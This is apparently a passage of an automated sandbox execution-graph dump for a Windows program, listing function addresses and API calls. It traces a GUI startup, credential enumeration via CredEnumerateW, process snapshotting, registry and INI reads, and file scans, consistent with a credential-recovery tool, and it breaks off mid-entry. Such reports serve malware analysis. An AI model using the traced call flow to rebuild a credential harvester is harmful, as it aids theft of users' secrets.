                                                execution_graph 40406 441819 40409 430737 40406->40409 40408 441825 40410 430756 40409->40410 40422 43076d 40409->40422 40411 430774 40410->40411 40412 43075f 40410->40412 40423 43034a 40411->40423 40434 4169a7 11 API calls 40412->40434 40415 4307ce 40416 430819 memset 40415->40416 40427 415b2c 40415->40427 40416->40422 40417 43077e 40417->40415 40420 4307fa 40417->40420 40417->40422 40419 4307e9 40419->40416 40419->40422 40435 4169a7 11 API calls 40420->40435 40422->40408 40424 430359 40423->40424 40425 43034e 40423->40425 40424->40417 40436 415c23 memcpy 40425->40436 40428 415b42 40427->40428 40433 415b46 40427->40433 40429 415b94 40428->40429 40431 415b5a 40428->40431 40428->40433 40430 4438b5 10 API calls 40429->40430 40430->40433 40432 415b79 memcpy 40431->40432 40431->40433 40432->40433 40433->40419 40434->40422 40435->40422 40436->40424 37677 442ec6 19 API calls 37854 4152c6 malloc 37855 4152e2 37854->37855 37856 4152ef 37854->37856 37858 416760 11 API calls 37856->37858 37858->37855 37859 4466f4 37878 446904 37859->37878 37861 446700 GetModuleHandleA 37864 446710 __set_app_type __p__fmode __p__commode 37861->37864 37863 4467a4 37865 4467ac __setusermatherr 37863->37865 37866 4467b8 37863->37866 37864->37863 37865->37866 37879 4468f0 _controlfp 37866->37879 37868 4467bd _initterm __wgetmainargs _initterm 37869 44681e GetStartupInfoW 37868->37869 37870 446810 37868->37870 37872 446866 GetModuleHandleA 37869->37872 37880 41276d 37872->37880 37876 446896 exit 37877 44689d _cexit 37876->37877 37877->37870 37878->37861 37879->37868 37881 41277d 37880->37881 37923 4044a4 LoadLibraryW 37881->37923 37883 412785 37915 412789 37883->37915 37931 414b81 37883->37931 37886 4127c8 37937 412465 memset ??2@YAPAXI 37886->37937 37888 4127ea 37949 40ac21 37888->37949 37893 412813 37967 40dd07 memset 37893->37967 37894 412827 37972 40db69 memset 37894->37972 37897 412822 37993 4125b6 ??3@YAXPAX 37897->37993 37899 40ada2 _wcsicmp 37900 41283d 37899->37900 37900->37897 37903 412863 CoInitialize 37900->37903 37977 41268e 37900->37977 37997 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37903->37997 37905 41296f 37999 40b633 37905->37999 37910 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37914 412957 37910->37914 37920 4128ca 37910->37920 37914->37897 37915->37876 37915->37877 37916 4128d0 TranslateAcceleratorW 37917 412941 GetMessageW 37916->37917 37916->37920 37917->37914 37917->37916 37918 412909 IsDialogMessageW 37918->37917 37918->37920 37919 4128fd IsDialogMessageW 37919->37917 37919->37918 37920->37916 37920->37918 37920->37919 37921 41292b TranslateMessage DispatchMessageW 37920->37921 37922 41291f IsDialogMessageW 37920->37922 37921->37917 37922->37917 37922->37921 37924 4044cf GetProcAddress 37923->37924 37927 4044f7 37923->37927 37925 4044e8 FreeLibrary 37924->37925 37928 4044df 37924->37928 37926 4044f3 37925->37926 37925->37927 37926->37927 37929 404507 MessageBoxW 37927->37929 37930 40451e 37927->37930 37928->37925 37929->37883 37930->37883 37932 414b8a 37931->37932 37933 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37931->37933 38003 40a804 memset 37932->38003 37933->37886 37936 414b9e GetProcAddress 37936->37933 37938 4124e0 37937->37938 37939 412505 ??2@YAPAXI 37938->37939 37940 41251c 37939->37940 37942 412521 37939->37942 38025 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37940->38025 38014 444722 37942->38014 37948 41259b wcscpy 37948->37888 38030 40b1ab ??3@YAXPAX ??3@YAXPAX 37949->38030 37953 40ad4b 37962 40ad76 37953->37962 38054 40a9ce 37953->38054 37954 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37956 40ac5c 37954->37956 37956->37953 37956->37954 37957 40ace7 ??3@YAXPAX 37956->37957 37956->37962 38034 40a8d0 37956->38034 38046 4099f4 37956->38046 37957->37956 37961 40a8d0 7 API calls 37961->37962 38031 40aa04 37962->38031 37963 40ada2 37964 40adc9 37963->37964 37965 40adaa 37963->37965 37964->37893 37964->37894 37965->37964 37966 40adb3 _wcsicmp 37965->37966 37966->37964 37966->37965 38059 40dce0 37967->38059 37969 40dd3a GetModuleHandleW 38064 40dba7 37969->38064 37973 40dce0 3 API calls 37972->37973 37974 40db99 37973->37974 38136 40dae1 37974->38136 38150 402f3a 37977->38150 37979 412766 37979->37897 37979->37903 37980 4126d3 _wcsicmp 37981 4126a8 37980->37981 37981->37979 37981->37980 37983 41270a 37981->37983 38184 4125f8 7 API calls 37981->38184 37983->37979 38153 411ac5 37983->38153 37994 4125da 37993->37994 37995 4125f0 37994->37995 37996 4125e6 DeleteObject 37994->37996 37998 40b1ab ??3@YAXPAX ??3@YAXPAX 37995->37998 37996->37995 37997->37910 37998->37905 38000 40b640 37999->38000 38001 40b639 ??3@YAXPAX 37999->38001 38002 40b1ab ??3@YAXPAX ??3@YAXPAX 38000->38002 38001->38000 38002->37915 38004 40a83b GetSystemDirectoryW 38003->38004 38005 40a84c wcscpy 38003->38005 38004->38005 38010 409719 wcslen 38005->38010 38008 40a881 LoadLibraryW 38009 40a886 38008->38009 38009->37933 38009->37936 38011 409724 38010->38011 38012 409739 wcscat LoadLibraryW 38010->38012 38011->38012 38013 40972c wcscat 38011->38013 38012->38008 38012->38009 38013->38012 38015 444732 38014->38015 38016 444728 DeleteObject 38014->38016 38026 409cc3 38015->38026 38016->38015 38018 412551 38019 4010f9 38018->38019 38020 401130 38019->38020 38021 401134 GetModuleHandleW LoadIconW 38020->38021 38022 401107 wcsncat 38020->38022 38023 40a7be 38021->38023 38022->38020 38024 40a7d2 38023->38024 38024->37948 38024->38024 38025->37942 38029 409bfd memset wcscpy 38026->38029 38028 409cdb CreateFontIndirectW 38028->38018 38029->38028 38030->37956 38032 40aa14 38031->38032 38033 40aa0a ??3@YAXPAX 38031->38033 38032->37963 38033->38032 38035 40a8eb 38034->38035 38036 40a8df wcslen 38034->38036 38037 40a906 ??3@YAXPAX 38035->38037 38038 40a90f 38035->38038 38036->38035 38042 40a919 38037->38042 38039 4099f4 3 API calls 38038->38039 38039->38042 38040 40a932 38044 4099f4 3 API calls 38040->38044 38041 40a929 ??3@YAXPAX 38043 40a93e memcpy 38041->38043 38042->38040 38042->38041 38043->37956 38045 40a93d 38044->38045 38045->38043 38047 409a41 38046->38047 38048 4099fb malloc 38046->38048 38047->37956 38050 409a37 38048->38050 38051 409a1c 38048->38051 38050->37956 38052 409a30 ??3@YAXPAX 38051->38052 38053 409a20 memcpy 38051->38053 38052->38050 38053->38052 38055 40a9e7 38054->38055 38056 40a9dc ??3@YAXPAX 38054->38056 38058 4099f4 3 API calls 38055->38058 38057 40a9f2 38056->38057 38057->37961 38058->38057 38083 409bca GetModuleFileNameW 38059->38083 38061 40dce6 wcsrchr 38062 40dcf5 38061->38062 38063 40dcf9 wcscat 38061->38063 38062->38063 38063->37969 38084 44db70 38064->38084 38068 40dbfd 38087 4447d9 38068->38087 38071 40dc34 wcscpy wcscpy 38113 40d6f5 38071->38113 38072 40dc1f wcscpy 38072->38071 38075 40d6f5 3 API calls 38076 40dc73 38075->38076 38077 40d6f5 3 API calls 38076->38077 38078 40dc89 38077->38078 38079 40d6f5 3 API calls 38078->38079 38080 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38079->38080 38119 40da80 38080->38119 38083->38061 38085 40dbb4 memset memset 38084->38085 38086 409bca GetModuleFileNameW 38085->38086 38086->38068 38089 4447f4 38087->38089 38088 40dc1b 38088->38071 38088->38072 38089->38088 38090 444807 ??2@YAPAXI 38089->38090 38091 44481f 38090->38091 38092 444873 _snwprintf 38091->38092 38093 4448ab wcscpy 38091->38093 38126 44474a 8 API calls 38092->38126 38095 4448bb 38093->38095 38127 44474a 8 API calls 38095->38127 38097 4448a7 38097->38093 38097->38095 38098 4448cd 38128 44474a 8 API calls 38098->38128 38100 4448e2 38129 44474a 8 API calls 38100->38129 38102 4448f7 38130 44474a 8 API calls 38102->38130 38104 44490c 38131 44474a 8 API calls 38104->38131 38106 444921 38132 44474a 8 API calls 38106->38132 38108 444936 38133 44474a 8 API calls 38108->38133 38110 44494b 38134 44474a 8 API calls 38110->38134 38112 444960 ??3@YAXPAX 38112->38088 38114 44db70 38113->38114 38115 40d702 memset GetPrivateProfileStringW 38114->38115 38116 40d752 38115->38116 38117 40d75c WritePrivateProfileStringW 38115->38117 38116->38117 38118 40d758 38116->38118 38117->38118 38118->38075 38120 44db70 38119->38120 38121 40da8d memset 38120->38121 38122 40daac LoadStringW 38121->38122 38123 40dac6 38122->38123 38123->38122 38125 40dade 38123->38125 38135 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38123->38135 38125->37897 38126->38097 38127->38098 38128->38100 38129->38102 38130->38104 38131->38106 38132->38108 38133->38110 38134->38112 38135->38123 38146 409b98 GetFileAttributesW 38136->38146 38138 40daea 38139 40db63 38138->38139 38140 40daef wcscpy wcscpy GetPrivateProfileIntW 38138->38140 38139->37899 38147 40d65d GetPrivateProfileStringW 38140->38147 38142 40db3e 38148 40d65d GetPrivateProfileStringW 38142->38148 38144 40db4f 38149 40d65d GetPrivateProfileStringW 38144->38149 38146->38138 38147->38142 38148->38144 38149->38139 38185 40eaff 38150->38185 38154 411ae2 memset 38153->38154 38155 411b8f 38153->38155 38225 409bca GetModuleFileNameW 38154->38225 38167 411a8b 38155->38167 38157 411b0a wcsrchr 38158 411b22 wcscat 38157->38158 38159 411b1f 38157->38159 38226 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38158->38226 38159->38158 38161 411b67 38227 402afb 38161->38227 38165 411b7f 38283 40ea13 SendMessageW memset SendMessageW 38165->38283 38168 402afb 27 API calls 38167->38168 38169 411ac0 38168->38169 38170 4110dc 38169->38170 38171 41113e 38170->38171 38176 4110f0 38170->38176 38308 40969c LoadCursorW SetCursor 38171->38308 38173 411143 38309 4032b4 38173->38309 38327 444a54 38173->38327 38174 4110f7 _wcsicmp 38174->38176 38175 411157 38177 40ada2 _wcsicmp 38175->38177 38176->38171 38176->38174 38330 410c46 10 API calls 38176->38330 38180 411167 38177->38180 38178 4111af 38180->38178 38181 4111a6 qsort 38180->38181 38181->38178 38184->37981 38186 40eb10 38185->38186 38198 40e8e0 38186->38198 38189 40eb6c memcpy memcpy 38190 40ebb7 38189->38190 38190->38189 38191 40ebf2 ??2@YAPAXI ??2@YAPAXI 38190->38191 38192 40d134 16 API calls 38190->38192 38193 40ec2e ??2@YAPAXI 38191->38193 38195 40ec65 38191->38195 38192->38190 38193->38195 38195->38195 38208 40ea7f 38195->38208 38197 402f49 38197->37981 38199 40e8f2 38198->38199 38200 40e8eb ??3@YAXPAX 38198->38200 38201 40e900 38199->38201 38202 40e8f9 ??3@YAXPAX 38199->38202 38200->38199 38203 40e911 38201->38203 38204 40e90a ??3@YAXPAX 38201->38204 38202->38201 38205 40e931 ??2@YAPAXI ??2@YAPAXI 38203->38205 38206 40e921 ??3@YAXPAX 38203->38206 38207 40e92a ??3@YAXPAX 38203->38207 38204->38203 38205->38189 38206->38207 38207->38205 38209 40aa04 ??3@YAXPAX 38208->38209 38210 40ea88 38209->38210 38211 40aa04 ??3@YAXPAX 38210->38211 38212 40ea90 38211->38212 38213 40aa04 ??3@YAXPAX 38212->38213 38214 40ea98 38213->38214 38215 40aa04 ??3@YAXPAX 38214->38215 38216 40eaa0 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40eab3 38217->38218 38219 40a9ce 4 API calls 38218->38219 38220 40eabd 38219->38220 38221 40a9ce 4 API calls 38220->38221 38222 40eac7 38221->38222 38223 40a9ce 4 API calls 38222->38223 38224 40ead1 38223->38224 38224->38197 38225->38157 38226->38161 38284 40b2cc 38227->38284 38229 402b0a 38230 40b2cc 27 API calls 38229->38230 38231 402b23 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b3a 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b54 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402b6b 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402b82 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402b99 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bb0 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402bc7 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402bde 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402bf5 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c0c 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c23 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c3a 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c51 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402c68 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402c7f 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402c99 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402cb3 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402cd5 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402cf0 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d0b 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d26 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d3e 38274->38275 38276 40b2cc 27 API calls 38275->38276 38277 402d59 38276->38277 38278 40b2cc 27 API calls 38277->38278 38279 402d78 38278->38279 38280 40b2cc 27 API calls 38279->38280 38281 402d93 38280->38281 38282 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38281->38282 38282->38165 38283->38155 38287 40b58d 38284->38287 38286 40b2d1 38286->38229 38288 40b5a4 GetModuleHandleW FindResourceW 38287->38288 38289 40b62e 38287->38289 38290 40b5c2 LoadResource 38288->38290 38291 40b5e7 38288->38291 38289->38286 38290->38291 38292 40b5d0 SizeofResource LockResource 38290->38292 38291->38289 38300 40afcf 38291->38300 38292->38291 38294 40b608 memcpy 38303 40b4d3 memcpy 38294->38303 38296 40b61e 38304 40b3c1 18 API calls 38296->38304 38298 40b626 38305 40b04b 38298->38305 38301 40b04b ??3@YAXPAX 38300->38301 38302 40afd7 ??2@YAPAXI 38301->38302 38302->38294 38303->38296 38304->38298 38306 40b051 ??3@YAXPAX 38305->38306 38307 40b05f 38305->38307 38306->38307 38307->38289 38308->38173 38310 4032c4 38309->38310 38311 40b633 ??3@YAXPAX 38310->38311 38312 403316 38311->38312 38331 44553b 38312->38331 38316 403480 38527 40368c 15 API calls 38316->38527 38318 403489 38319 40b633 ??3@YAXPAX 38318->38319 38320 403495 38319->38320 38320->38175 38321 4033a9 memset memcpy 38322 4033ec wcscmp 38321->38322 38323 40333c 38321->38323 38322->38323 38323->38316 38323->38321 38323->38322 38525 4028e7 11 API calls 38323->38525 38526 40f508 6 API calls 38323->38526 38325 403421 _wcsicmp 38325->38323 38328 444a64 FreeLibrary 38327->38328 38329 444a83 38327->38329 38328->38329 38329->38175 38330->38176 38332 445548 38331->38332 38333 445599 38332->38333 38528 40c768 38332->38528 38334 4455a8 memset 38333->38334 38340 4457f2 38333->38340 38611 403988 38334->38611 38343 445854 38340->38343 38713 403e2d memset memset memset memset memset 38340->38713 38394 4458aa 38343->38394 38736 403c9c memset memset memset memset memset 38343->38736 38344 445672 38622 403fbe memset memset memset memset memset 38344->38622 38345 4458bb memset memset 38347 414c2e 16 API calls 38345->38347 38346 4455e5 38346->38344 38356 44560f 38346->38356 38350 4458f9 38347->38350 38349 44595e memset memset 38354 414c2e 16 API calls 38349->38354 38355 40b2cc 27 API calls 38350->38355 38352 445a00 memset memset 38759 414c2e 38352->38759 38353 445b22 38359 445bca 38353->38359 38360 445b38 memset memset memset 38353->38360 38364 44599c 38354->38364 38365 445909 38355->38365 38367 4087b3 338 API calls 38356->38367 38357 44557a 38391 44558c 38357->38391 38808 41366b FreeLibrary 38357->38808 38358 445849 38823 40b1ab ??3@YAXPAX ??3@YAXPAX 38358->38823 38366 445c8b memset memset 38359->38366 38433 445cf0 38359->38433 38369 445bd4 38360->38369 38370 445b98 38360->38370 38373 40b2cc 27 API calls 38364->38373 38375 409d1f 6 API calls 38365->38375 38378 414c2e 16 API calls 38366->38378 38376 445621 38367->38376 38368 44589f 38824 40b1ab ??3@YAXPAX ??3@YAXPAX 38368->38824 38384 414c2e 16 API calls 38369->38384 38370->38369 38380 445ba2 38370->38380 38377 4459ac 38373->38377 38374 403335 38524 4452e5 45 API calls 38374->38524 38387 445919 38375->38387 38809 4454bf 20 API calls 38376->38809 38389 409d1f 6 API calls 38377->38389 38390 445cc9 38378->38390 38896 4099c6 wcslen 38380->38896 38381 4456b2 38811 40b1ab ??3@YAXPAX ??3@YAXPAX 38381->38811 38383 40b2cc 27 API calls 38395 445a4f 38383->38395 38397 445be2 38384->38397 38385 445d3d 38418 40b2cc 27 API calls 38385->38418 38386 445d88 memset memset memset 38401 414c2e 16 API calls 38386->38401 38825 409b98 GetFileAttributesW 38387->38825 38388 445823 38388->38358 38400 4087b3 338 API calls 38388->38400 38402 4459bc 38389->38402 38403 409d1f 6 API calls 38390->38403 38595 444b06 38391->38595 38392 445879 38392->38368 38413 4087b3 338 API calls 38392->38413 38394->38345 38419 44594a 38394->38419 38774 409d1f wcslen wcslen 38395->38774 38398 40b2cc 27 API calls 38397->38398 38407 445bf3 38398->38407 38400->38388 38410 445dde 38401->38410 38892 409b98 GetFileAttributesW 38402->38892 38412 445ce1 38403->38412 38404 445bb3 38899 445403 memset 38404->38899 38405 445680 38405->38381 38645 4087b3 memset 38405->38645 38417 409d1f 6 API calls 38407->38417 38408 445928 38408->38419 38826 40b6ef 38408->38826 38420 40b2cc 27 API calls 38410->38420 38916 409b98 GetFileAttributesW 38412->38916 38413->38392 38416 40b2cc 27 API calls 38425 445a94 38416->38425 38427 445c07 38417->38427 38428 445d54 _wcsicmp 38418->38428 38419->38349 38432 4459ed 38419->38432 38431 445def 38420->38431 38421 4459cb 38421->38432 38441 40b6ef 252 API calls 38421->38441 38779 40ae18 38425->38779 38426 44566d 38426->38340 38696 413d4c 38426->38696 38437 445389 258 API calls 38427->38437 38438 445d71 38428->38438 38503 445d67 38428->38503 38430 445665 38810 40b1ab ??3@YAXPAX ??3@YAXPAX 38430->38810 38439 409d1f 6 API calls 38431->38439 38432->38352 38432->38353 38433->38374 38433->38385 38433->38386 38434 445389 258 API calls 38434->38359 38443 445c17 38437->38443 38917 445093 23 API calls 38438->38917 38446 445e03 38439->38446 38441->38432 38442 4456d8 38448 40b2cc 27 API calls 38442->38448 38449 40b2cc 27 API calls 38443->38449 38445 44563c 38445->38430 38451 4087b3 338 API calls 38445->38451 38918 409b98 GetFileAttributesW 38446->38918 38447 40b6ef 252 API calls 38447->38374 38453 4456e2 38448->38453 38454 445c23 38449->38454 38450 445d83 38450->38374 38451->38445 38812 413fa6 _wcsicmp _wcsicmp 38453->38812 38458 409d1f 6 API calls 38454->38458 38456 445e12 38463 445e6b 38456->38463 38469 40b2cc 27 API calls 38456->38469 38461 445c37 38458->38461 38459 445aa1 38462 445b17 38459->38462 38477 445ab2 memset 38459->38477 38490 409d1f 6 API calls 38459->38490 38786 40add4 38459->38786 38791 445389 38459->38791 38800 40ae51 38459->38800 38460 4456eb 38465 4456fd memset memset memset memset 38460->38465 38466 4457ea 38460->38466 38467 445389 258 API calls 38461->38467 38893 40aebe 38462->38893 38920 445093 23 API calls 38463->38920 38813 409c70 wcscpy wcsrchr 38465->38813 38816 413d29 38466->38816 38473 445c47 38467->38473 38474 445e33 38469->38474 38471 445e7e 38476 445f67 38471->38476 38479 40b2cc 27 API calls 38473->38479 38480 409d1f 6 API calls 38474->38480 38485 40b2cc 27 API calls 38476->38485 38481 40b2cc 27 API calls 38477->38481 38483 445c53 38479->38483 38484 445e47 38480->38484 38481->38459 38482 409c70 2 API calls 38486 44577e 38482->38486 38487 409d1f 6 API calls 38483->38487 38919 409b98 GetFileAttributesW 38484->38919 38489 445f73 38485->38489 38491 409c70 2 API calls 38486->38491 38492 445c67 38487->38492 38494 409d1f 6 API calls 38489->38494 38490->38459 38495 44578d 38491->38495 38496 445389 258 API calls 38492->38496 38493 445e56 38493->38463 38499 445e83 memset 38493->38499 38497 445f87 38494->38497 38495->38466 38502 40b2cc 27 API calls 38495->38502 38496->38359 38923 409b98 GetFileAttributesW 38497->38923 38501 40b2cc 27 API calls 38499->38501 38504 445eab 38501->38504 38505 4457a8 38502->38505 38503->38374 38503->38447 38506 409d1f 6 API calls 38504->38506 38507 409d1f 6 API calls 38505->38507 38508 445ebf 38506->38508 38509 4457b8 38507->38509 38510 40ae18 9 API calls 38508->38510 38815 409b98 GetFileAttributesW 38509->38815 38520 445ef5 38510->38520 38512 4457c7 38512->38466 38514 4087b3 338 API calls 38512->38514 38513 40ae51 9 API calls 38513->38520 38514->38466 38515 445f5c 38517 40aebe FindClose 38515->38517 38516 40add4 2 API calls 38516->38520 38517->38476 38518 40b2cc 27 API calls 38518->38520 38519 409d1f 6 API calls 38519->38520 38520->38513 38520->38515 38520->38516 38520->38518 38520->38519 38522 445f3a 38520->38522 38921 409b98 GetFileAttributesW 38520->38921 38922 445093 23 API calls 38522->38922 38524->38323 38525->38325 38526->38323 38527->38318 38529 40c775 38528->38529 38924 40b1ab ??3@YAXPAX ??3@YAXPAX 38529->38924 38531 40c788 38925 40b1ab ??3@YAXPAX ??3@YAXPAX 38531->38925 38533 40c790 38926 40b1ab ??3@YAXPAX ??3@YAXPAX 38533->38926 38535 40c798 38536 40aa04 ??3@YAXPAX 38535->38536 38537 40c7a0 38536->38537 38927 40c274 memset 38537->38927 38542 40a8ab 9 API calls 38543 40c7c3 38542->38543 38544 40a8ab 9 API calls 38543->38544 38545 40c7d0 38544->38545 38956 40c3c3 38545->38956 38549 40c7e5 38550 40c877 38549->38550 38551 40c86c 38549->38551 38557 40c634 49 API calls 38549->38557 38981 40a706 38549->38981 38558 40bdb0 38550->38558 38998 4053fe 39 API calls 38551->38998 38557->38549 39188 404363 38558->39188 38561 40bf5d 39208 40440c 38561->39208 38563 40bdee 38563->38561 38566 40b2cc 27 API calls 38563->38566 38564 40bddf CredEnumerateW 38564->38563 38567 40be02 wcslen 38566->38567 38567->38561 38569 40be1e 38567->38569 38568 40be26 _wcsncoll 38568->38569 38569->38561 38569->38568 38572 40be7d memset 38569->38572 38573 40bea7 memcpy 38569->38573 38574 40bf11 wcschr 38569->38574 38575 40b2cc 27 API calls 38569->38575 38577 40bf43 LocalFree 38569->38577 39211 40bd5d 28 API calls 38569->39211 39212 404423 38569->39212 38572->38569 38572->38573 38573->38569 38573->38574 38574->38569 38576 40bef6 _wcsnicmp 38575->38576 38576->38569 38576->38574 38577->38569 38578 4135f7 39225 4135e0 38578->39225 38581 40b2cc 27 API calls 38582 41360d 38581->38582 38583 40a804 8 API calls 38582->38583 38584 413613 38583->38584 38585 41361b 38584->38585 38586 41363e 38584->38586 38587 40b273 27 API calls 38585->38587 38588 4135e0 FreeLibrary 38586->38588 38589 413625 GetProcAddress 38587->38589 38590 413643 38588->38590 38589->38586 38591 413648 38589->38591 38590->38357 38592 413658 38591->38592 38593 4135e0 FreeLibrary 38591->38593 38592->38357 38594 413666 38593->38594 38594->38357 39228 4449b9 38595->39228 38598 444c1f 38598->38333 38599 4449b9 42 API calls 38601 444b4b 38599->38601 38600 444c15 38603 4449b9 42 API calls 38600->38603 38601->38600 39249 444972 GetVersionExW 38601->39249 38603->38598 38604 444b99 memcmp 38609 444b8c 38604->38609 38605 444c0b 39253 444a85 42 API calls 38605->39253 38609->38604 38609->38605 39250 444aa5 42 API calls 38609->39250 39251 40a7a0 GetVersionExW 38609->39251 39252 444a85 42 API calls 38609->39252 38612 40399d 38611->38612 39254 403a16 38612->39254 38614 403a09 39268 40b1ab ??3@YAXPAX ??3@YAXPAX 38614->39268 38616 403a12 wcsrchr 38616->38346 38617 4039a3 38617->38614 38620 4039f4 38617->38620 39265 40a02c CreateFileW 38617->39265 38620->38614 38621 4099c6 2 API calls 38620->38621 38621->38614 38623 414c2e 16 API calls 38622->38623 38624 404048 38623->38624 38625 414c2e 16 API calls 38624->38625 38626 404056 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 404073 38627->38628 38629 409d1f 6 API calls 38628->38629 38630 40408e 38629->38630 38631 409d1f 6 API calls 38630->38631 38632 4040a6 38631->38632 38633 403af5 20 API calls 38632->38633 38634 4040ba 38633->38634 38635 403af5 20 API calls 38634->38635 38636 4040cb 38635->38636 39295 40414f memset 38636->39295 38638 404140 39309 40b1ab ??3@YAXPAX ??3@YAXPAX 38638->39309 38640 4040ec memset 38643 4040e0 38640->38643 38641 404148 38641->38405 38642 4099c6 2 API calls 38642->38643 38643->38638 38643->38640 38643->38642 38644 40a8ab 9 API calls 38643->38644 38644->38643 39322 40a6e6 WideCharToMultiByte 38645->39322 38647 4087ed 39323 4095d9 memset 38647->39323 38650 408953 38650->38405 38651 408809 memset memset memset memset memset 38652 40b2cc 27 API calls 38651->38652 38653 4088a1 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088b1 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088c0 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 4088d0 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 4088df 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 4088ef 38662->38663 38664 40b2cc 27 API calls 38663->38664 38665 4088fe 38664->38665 38666 409d1f 6 API calls 38665->38666 38667 40890e 38666->38667 38668 40b2cc 27 API calls 38667->38668 38669 40891d 38668->38669 38670 409d1f 6 API calls 38669->38670 38671 40892d 38670->38671 38697 40b633 ??3@YAXPAX 38696->38697 38698 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38697->38698 38699 413f00 Process32NextW 38698->38699 38700 413da5 OpenProcess 38699->38700 38701 413f17 CloseHandle 38699->38701 38702 413df3 memset 38700->38702 38706 413eb0 38700->38706 38701->38442 39634 413f27 38702->39634 38704 413ebf ??3@YAXPAX 38704->38706 38705 4099f4 3 API calls 38705->38706 38706->38699 38706->38704 38706->38705 38708 413e37 GetModuleHandleW 38709 413e46 GetProcAddress 38708->38709 38710 413e1f 38708->38710 38709->38710 38710->38708 39639 413959 38710->39639 39655 413ca4 38710->39655 38712 413ea2 CloseHandle 38712->38706 38714 414c2e 16 API calls 38713->38714 38715 403eb7 38714->38715 38716 414c2e 16 API calls 38715->38716 38717 403ec5 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403ee2 38718->38719 38720 409d1f 6 API calls 38719->38720 38721 403efd 38720->38721 38722 409d1f 6 API calls 38721->38722 38723 403f15 38722->38723 38724 403af5 20 API calls 38723->38724 38725 403f29 38724->38725 38726 403af5 20 API calls 38725->38726 38727 403f3a 38726->38727 38728 40414f 33 API calls 38727->38728 38733 403f4f 38728->38733 38729 403faf 39669 40b1ab ??3@YAXPAX ??3@YAXPAX 38729->39669 38731 403f5b memset 38731->38733 38732 403fb7 38732->38388 38733->38729 38733->38731 38734 4099c6 2 API calls 38733->38734 38735 40a8ab 9 API calls 38733->38735 38734->38733 38735->38733 38737 414c2e 16 API calls 38736->38737 38738 403d26 38737->38738 38739 414c2e 16 API calls 38738->38739 38740 403d34 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d51 38741->38742 38743 409d1f 6 API calls 38742->38743 38744 403d6c 38743->38744 38745 409d1f 6 API calls 38744->38745 38746 403d84 38745->38746 38747 403af5 20 API calls 38746->38747 38748 403d98 38747->38748 38749 403af5 20 API calls 38748->38749 38750 403da9 38749->38750 38751 40414f 33 API calls 38750->38751 38752 403dbe 38751->38752 38753 403e1e 38752->38753 38754 403dca memset 38752->38754 38757 4099c6 2 API calls 38752->38757 38758 40a8ab 9 API calls 38752->38758 39670 40b1ab ??3@YAXPAX ??3@YAXPAX 38753->39670 38754->38752 38756 403e26 38756->38392 38757->38752 38758->38752 38760 414b81 9 API calls 38759->38760 38761 414c40 38760->38761 38762 414c73 memset 38761->38762 39671 409cea 38761->39671 38764 414c94 38762->38764 39674 414592 RegOpenKeyExW 38764->39674 38766 414c64 38766->38383 38768 414cc1 38769 414cf4 wcscpy 38768->38769 39675 414bb0 wcscpy 38768->39675 38769->38766 38771 414cd2 39676 4145ac RegQueryValueExW 38771->39676 38773 414ce9 RegCloseKey 38773->38769 38775 409d62 38774->38775 38776 409d43 wcscpy 38774->38776 38775->38416 38777 409719 2 API calls 38776->38777 38778 409d51 wcscat 38777->38778 38778->38775 38780 40aebe FindClose 38779->38780 38781 40ae21 38780->38781 38782 4099c6 2 API calls 38781->38782 38783 40ae35 38782->38783 38784 409d1f 6 API calls 38783->38784 38785 40ae49 38784->38785 38785->38459 38787 40ade0 38786->38787 38788 40ae0f 38786->38788 38787->38788 38789 40ade7 wcscmp 38787->38789 38788->38459 38789->38788 38790 40adfe wcscmp 38789->38790 38790->38788 38792 40ae18 9 API calls 38791->38792 38798 4453c4 38792->38798 38793 40ae51 9 API calls 38793->38798 38794 4453f3 38796 40aebe FindClose 38794->38796 38795 40add4 2 API calls 38795->38798 38797 4453fe 38796->38797 38797->38459 38798->38793 38798->38794 38798->38795 38799 445403 253 API calls 38798->38799 38799->38798 38801 40ae7b FindNextFileW 38800->38801 38802 40ae5c FindFirstFileW 38800->38802 38803 40ae94 38801->38803 38804 40ae8f 38801->38804 38802->38803 38806 409d1f 6 API calls 38803->38806 38807 40aeb6 38803->38807 38805 40aebe FindClose 38804->38805 38805->38803 38806->38807 38807->38459 38808->38391 38809->38445 38810->38426 38811->38426 38812->38460 38814 